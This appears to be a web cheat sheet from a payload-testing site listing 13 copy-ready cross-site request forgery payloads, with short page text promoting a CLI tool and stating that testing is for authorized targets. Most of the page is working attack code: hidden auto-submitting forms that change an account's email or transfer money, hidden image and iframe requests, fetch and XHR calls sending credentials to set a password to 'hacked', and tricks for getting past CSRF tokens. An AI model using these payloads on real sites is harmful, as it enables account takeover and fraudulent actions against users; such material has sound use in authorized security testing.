Cross-Site Request Forgery proof-of-concept payloads for auto-submitting forms, XHR, fetch, and JSON CSRF. (13 payloads)
<form action="https://TARGET/change-email" method="POST"><input type="hidden" name="email" value="[email protected]"/></form><script>document.forms[0].submit();</script><form action="https://TARGET/transfer" method="POST" enctype="text/plain"><input name='{"amount":1000,"to":"attacker","ignore":"'value='"}'/></form><script>document.forms[0].submit();</script><img src="https://TARGET/delete?id=1" style="display:none"><iframe src="https://TARGET/action?param=value" style="display:none"></iframe><script>fetch("https://TARGET/api/change-password",{method:"POST",credentials:"include",headers:{"Content-Type":"application/x-www-form-urlencoded"},body:"password=hacked"})</script><script>var x=new XMLHttpRequest();x.open("POST","https://TARGET/api/action");x.withCredentials=true;x.setRequestHeader("Content-Type","application/x-www-form-urlencoded");x.send("param=value");</script><script>fetch("https://TARGET/api/action",{method:"POST",credentials:"include",headers:{"Content-Type":"application/json"},body:JSON.stringify({key:"value"})})</script>Remove CSRF token parameter entirelyUse empty string as CSRF token valueSwap CSRF token from another sessionChange POST to GET and move params to query stringChange Content-Type to text/plain or multipart/form-dataUse same CSRF token value twiceLevel up your security testing
Install the CLI
npx payload-playgroundExplore All Tools
Encoding, hashing, JWT & more
Browse Cheat Sheets
Quick-reference payload guides
It's a quick-reference collection of 13 CSRF payloads for testing CSRF vulnerabilities during authorized penetration testing, bug bounties, and CTFs. Every payload is copy-ready and grouped by attack context.
Copy any payload straight into your authorized test, or open the CORS Misconfiguration generator to build customized CSRF variants with encoding and WAF-bypass options. Only test systems you have explicit permission to assess.
Yes — this cheat sheet and all CSRF payloads are completely free, with no account required. Everything runs in your browser.